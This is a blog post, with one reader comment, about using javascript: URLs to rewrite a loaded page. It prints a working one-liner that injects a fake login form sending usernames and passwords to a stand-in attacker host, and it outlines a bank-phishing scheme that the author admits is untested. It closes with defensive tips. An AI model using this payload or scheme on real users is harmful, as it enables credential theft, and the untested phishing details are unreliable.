To start: how it works. First off, understand this is a browser trick, not a web site hack: the JavaScript runs inside the victim's own browser against whatever page is loaded, so nothing the site's developers do on the server can block it, and only a change in how browsers treat a javascript: URL typed into the address bar would (newer browsers do in fact strip the javascript: prefix from text pasted into the address bar for exactly this reason). Understand that what I am about to tell you is educational, with the hope that you educate friends and family about how this works so they can avoid being attacked.
IF YOU DO ANY OF THIS, YOU COULD GET ARRESTED BECAUSE YOU WOULD BE BREAKING THE LAW.
So, now, on with it. We are going to hack my web site: http://enginpost.com, so pop open another browser window and load that URL.
Most modern browsers let you enter JavaScript in the address bar (a javascript: URL) for testing purposes. That convenience is the weakness we are about to exploit.
Here we go:
- Click on my resume and notice where the content goes on the webpage. If you were to examine the HTML under the page you would see that the content is being Fjaxed (like Ajax, but better) into the DIV with the ID "FlashJxContent." You can quickly view the content of whatever is currently in that DIV by pasting the following code into your browser's address bar:
javascript:alert(document.getElementById('FlashJxContent').innerHTML) - That should show you the HTML inside the DIV. Now let's imagine my website was secure and people would come to it to log in. I am a nasty human being and I want to harvest people's login usernames and passwords. So what I want to do is create a fake form to gather this information and submit the details to a page on another website (where I gather the info and save it to my little database). Since we know how to read the innerHTML of a DIV, we should be able to write to it as well.
- I want to get a fake form into the DIV where the HTML looks something like:
Notice that the form submits the results to another website. Horrible, right? - To get this form into the existing webpage, paste the following JavaScript into the address bar (the inputs need name attributes, otherwise the browser submits no values at all):
javascript:void(document.getElementById('FlashJxContent').innerHTML = "<form action='http://www.SomeTemporarySite.com/steal_logins.asp' method='get'>Enter Username: <input name='UID' id='UID' type='text'><br />Enter Password: <input name='PWD' id='PWD' type='password'><input type='submit' value='Login'></form>")
Wow, huh? Notice that the page, its title and its content all still say we are on the same site, even though the URL in the address bar now looks a little weird (but then again, how many users really understand what is going on in a URL?). If you wanted to change a few more areas of the page, the bad dude only has to put a comma after the closing double-quote and add another innerHTML assignment to another DIV inside the same void(...), which rewrites both at once. (A semicolon there would not work: void() takes a single expression, so a second statement has to go after the closing parenthesis instead.)
HOW would this likely be implemented?
I hate to write this part because people could use this like instructions, so I won't go into a ton of specific detail, but basically...
If someone sent out an email saying you need to go to your account and fix something at your bank, the link in your HTML-enabled email could say "login to your bank" but really point to that nasty website. The page that loads could say "loading Your Community Bank secure login..." and pop another window that hides the address bar. This window would really load your bank's website. Then, a few seconds later, the original page would load the JavaScript into the location of that other popped window (I have not tested this, but I think it would work, since we opened the page to begin with). At that point you would be on your bank's website but filling out a form that really has nothing to do with your bank.
HOW do you guard family and friends against this?
- Tell them not to fill out web forms on pages that don't show the address in the address bar of the browser. If the URL seems funny, don't use the form.
- Watch the address the form submits to. If you hover over the submit button, notice that it tells you that it is headed away from the enginpost website (in the above example). The average Joe may not be aware of this and it may seem a techy thing to do, but these days, that may yet be required.
Other than that, there isn't much more users can do to protect themselves from this hack on their own; the fix has to come from the browser, and the one browsers have since adopted is to refuse, or strip the javascript: prefix from, script pasted into the address bar.
1 comment:
"If you hover over the submit button, notice that it tells you that it is headed away from the enginpost website"
Not true in FireFox.